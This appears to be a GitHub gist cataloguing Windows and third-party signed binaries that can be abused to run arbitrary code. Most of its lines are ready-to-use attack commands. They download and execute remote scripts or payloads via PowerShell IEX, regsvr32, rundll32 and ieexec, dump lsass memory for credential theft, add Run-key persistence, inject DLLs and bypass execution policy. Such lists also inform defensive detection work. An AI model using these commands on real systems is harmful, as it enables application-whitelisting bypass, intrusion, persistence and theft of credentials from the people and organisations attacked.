BinariesThatDoesOtherStuff
August 2, 2021 ยท View on GitHub
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll certutil -Class http://WScript.Shell certutil -urlcache -split -f http://example.com/file certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100 https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat pcalua.exe -a \server\payload.dll pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf https://twitter.com/KyleHanslovan/status/911997635455852544 https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
sqldumper 540 0 0x01100 https://twitter.com/countuponsec/status/910969424215232518
fsi.exe https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe "C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe "C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe AppVLP.exe \webdav\calc.bat
SQLPS.exe Powershell host https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe diskshadow.exe /s c:\test\diskshadow.txt diskshadow> exec calc.exe https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \server.domain.com\tool\file.exe print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries *** nvuhda.exe nvuhda6.exe nvuhda6.exe System calc.exe nvuhda6.exe Copy test.txt,test-2.txt nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32" nvuhda6.exe KillApp calculator.exe nvuhda6.exe Run foo http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
#Intel GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896
iAutorun.exe (Intel Pro Wireless software) Put in autorun.inf: XP_APPS_32=c:\windows\system32\notepad.exe XP_APPS_64=c:\windows\system32\notepad.exe VISTA_APPS_32=c:\windows\system32\notepad.exe VISTA_APPS_64=c:\windows\system32\notepad.exe WIN7_APPS_32=c:\windows\system32\notepad.exe WIN7_APPS_64=c:\windows\system32\notepad.exe WIN8_APPS_32=c:\windows\system32\notepad.exe WIN8_APPS_64=c:\windows\system32\notepad.exe WINPLUS_APPS_32=c:\windows\system32\notepad.exe WINPLUS_APPS_64=c:\windows\system32\notepad.exe RUNMODE=WAIT http://www.hexacorn.com/blog/2019/08/20/sitting-on-the-lolbins-2/
LaunchDelay.exe notepad.exe 5 Sample: 775DBEC29C3558A61CCFFDBA6E319E4BCF2C5C2EA91C6F5AF04E88C699B7D7A8 http://www.hexacorn.com/blog/2019/08/22/sitting-on-the-lolbins-3/
#Acer RunCmd_x64.exe C:\windows\system32\calc.exe https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
#Plex plexscripthost.exe #Pythonscript engine https://twitter.com/Oddvarmoe/status/1092230434786869249
#Splunk %USERPROFILE%\AppData\Local\slack\update.exe --processStart "test.exe" https://twitter.com/Hexacorn/status/1108429585602019328
#notepad++ Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
#Lotus notes Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Run PowerShell via LotusNotes
#Citrix C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Execute calc.exe through DefaultInstall Section Directive in INF file.
#Tanium Tpowershell.exe https://twitter.com/Hexacorn/status/1108288002193805312
#Nvidia GeForce Experience courgette.exe -dis c:\temp\Autoruns.exe c:\temp\autoruns.asm courgette.exe -asm c:\temp\autoruns.asm c:\temp\compiled\autorunsfromasm.exe https://twitter.com/Oddvarmoe/status/1123249551756935169
#Avast aswRunDll.exe c:\temp\myDll.dll https://twitter.com/pabraeken/status/1000806146805059585
#Valve
C:\program files(x86)\Steam> writeminidump.exe
#Pubg Lite C:\Program Files (x86)\PUBGLite\Client\ucldr_bgl_se.exe mimikatz.exe https://twitter.com/_felamos/status/1148166305129758720?s=21
#HP Printer drivers
c:\Program Files\HP<model>
\Bin<model>.exe
\Bin\HPCustParticUI.exe
\Bin\hpqDTSS.exe
\Bin\InstanceFinderDlg.exe
\Bin\ScanToPCActivationApp.exe
\Bin\Toolbox.exe
Also possible but needs more arguments: \Bin\DigitalWizards.exe \Bin\FaxApplications.exe \Bin\HPRewards.exe http://www.hexacorn.com/blog/2019/08/19/sitting-on-the-lolbins-1/
ZOHO Corporation private Limited
dctask64.exe injectDll
Avira Antivirus type cmd.txt | Avira.PWM.NativeMessaging.exe - In bat file https://medium.com/@knikolenko/avira-free-antivirus-password-collector-83452fa7f943 https://twitter.com/malwrhunterteam/status/1258346778421846017
#Cisco Jabber
cd c:\program files (x86)\cisco systems\cisco jabber\x64
processdump.exe (ps lsass).id c:\temp\lsass.dmp
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#processdump-exe-from-cisco-jabber
https://twitter.com/spotheplanet/status/1310606426172162050
#Discord discordhookhelper64.exe inject DiscordHook64.dll 0 3785 https://twitter.com/Blackmond_/status/1317035680682397701
#Symantec https://twitter.com/nas_bench/status/1385599433333686278
#Spotify
https://twitter.com/Hexacorn/status/1412517463892414469
SpotifySetup.exe --url